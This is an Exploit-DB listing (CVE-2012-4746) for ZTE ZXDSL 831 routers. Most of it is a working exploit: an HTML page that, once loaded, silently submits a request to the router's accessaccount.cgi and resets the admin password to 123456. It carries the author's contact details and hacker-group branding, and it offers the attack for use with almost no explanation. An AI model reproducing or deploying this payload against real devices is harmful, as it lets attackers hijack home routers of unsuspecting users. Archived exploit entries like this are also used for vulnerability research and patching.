ZTE Change admin password

2012-04-08T00:00:00
ID EDB-ID:18722
Type exploitdb
Reporter Nuevo Asesino
Modified 2012-04-08T00:00:00

Description

ZTE Change admin password. CVE-2012-4746. Webapps exploit for cgi platform

                                        
                                            # Exploit Title: ZTE Change admin password
# Author: Nuevo Asesino
# Version: ZTE Inc., Software Release ZXDSL 831IIV7.5.0a_Z29_OV
#################################################################################################
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>Exploit By Nuevo Asesino </H2>
<form method="POST" name="form0" action="http:\192.168.1.1\accessaccount.cgi?sysPassword=123456">
</form>
</body>
</html> ##################################################################################################                                                                                                  
password ======> 123456
Now you can get the username & the password------------------------------------------------------Contact  :Oeb1590@hotmail.comFacebook : Https:\www.facebook.com\Want.Revenge 
              \|||/           .-.________                (o o)                ________.-.     -----/ \_)_______)  +----------oooO------------+   (_______(_/   \------         (    ()___)         The Blacke Devils               (___()    )               ()__)                                         (__()         ----\___()_)         Algeria Warriors                (_()___/-----                                                            +-------------Ooo----------+                                In:Arab47.com